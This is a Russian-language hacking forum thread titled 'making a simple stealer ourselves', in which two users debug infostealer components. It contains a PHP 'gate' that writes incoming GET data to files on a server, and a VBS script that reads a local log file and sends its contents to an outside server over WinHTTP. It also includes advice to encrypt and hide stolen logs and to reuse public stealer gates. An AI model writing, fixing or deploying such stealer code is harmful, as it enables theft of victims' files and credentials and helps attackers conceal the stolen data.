ВАЖНО Делаем простенький стилер сами


MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
425
Репутация
127
А код самого гейта должен выглядеть так?
<?php
file_put_contents('log.txt' "\r\n",FILE_APPEND);
?>
но опять же как сделать чтобы в папке с гейтом постоянно новые файлы создавались
Зы скрипт ошибку выдает
Безымянный.png
 
Последнее редактирование:

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 122
Репутация
8 238
Я vbs вроде выкладывал, а у тебя на скрине js !

Про гейт, посмотри как сделано в паблик гейтах, всё тоже самое, можно ещё шифровать + сами логи нужно шифровать/прятать от любопытных морд...like it
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
425
Репутация
127
Я vbs вроде выкладывал, а у тебя на скрине js !

Про гейт, посмотри как сделано в паблик гейтах, всё тоже самое, можно ещё шифровать + сами логи нужно шифровать/прятать от любопытных морд...like it
хд вечером чтото не заметил)
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
425
Репутация
127
Ну как бы вот нашел гейт со стиллера одного
Код:
<?php
$fname = $_GET['fname'];
$data = $_GET['data'];

unlink($fname);
$open = fopen($fname, 'a');
fwrite($open, $data);
fclose($open);

echo "Success";
?>
И скрипт на vbs нормально вроде работает, но как сделать чтобы он выбирал точный файл допустим лежит в директории с vbs файл 1.log который нужно отправить, и как на счет гейта он подойдет?
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 122
Репутация
8 238
Гейт подойдёт, только тут не шифровки, не скрытия логов нет, любой желающий сможет посмотреть логи, я давно уже не занимался, есть-же уже готовые гейты, по мойму у Вазонеза даже был, его можно взять как рыбу...:)

допустим лежит в директории с vbs файл 1.log
Ну а какая проблема ?

vbs умеет работать с файлами, узнаешь текущий каталог, читаешь файл, пересылаешь на гейт, пример кстати тут есть:Помощь.Скриптовые языки программирования (VBS, Jscript)
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
425
Репутация
127
Код:
Set WshShell = CreateObject("WScript.Shell")
UserPath=WshShell.CurrentDirectory
text=CreateObject("Scripting.FileSystemObject").OpenTextFile(UserPath+"\1.log").ReadAll
Set oHTTP = CreateObject("winhttp.winhttprequest.5.1")
sSource = "http://server/1.php?var=" &text
oHTTP.open "GET", sSource, False
oHTTP.send
Выдает ошибку: ввод данных за пределами файла
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 122
Репутация
8 238
Выдает ошибку: ввод данных за пределами файла
А в какой строке ошибка ?

sSource = " " &text
Тут скорей-всего правильней так:
Код:
sSource = "http://server/1.php?var=&text"

Т.е. кавычки не правильно поставлены...:)
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
425
Репутация
127

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 122
Репутация
8 238
Он пустой что-ли ?

Попробуй так, вместо text=CreateObject("Scripting.FileSystemObject").OpenTextFile(UserPath+"\1.log").ReadAll:
Код:
text1=CreateObject("Scripting.FileSystemObject").OpenTextFile(UserPath+"\1.log")
text=text1.ReadAll

Может помочь ещё указание имени потока в конце через двоеточие по мойму, в этой строке text=CreateObject("Scripting.FileSystemObject").OpenTextFile(UserPath+"\1.log").ReadAll
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
425
Репутация
127
Он пустой что-ли ?

Попробуй так, вместо text=CreateObject("Scripting.FileSystemObject").OpenTextFile(UserPath+"\1.log").ReadAll:
Код:
text1=CreateObject("Scripting.FileSystemObject").OpenTextFile(UserPath+"\1.log")
text=text1.ReadAll

Может помочь ещё указание имени потока в конце через двоеточие по мойму, в этой строке text=CreateObject("Scripting.FileSystemObject").OpenTextFile(UserPath+"\1.log").ReadAll
второй вариант заработал, файл в интернет выходит, только вот на сервере ничего не появляется
 
Верх Низ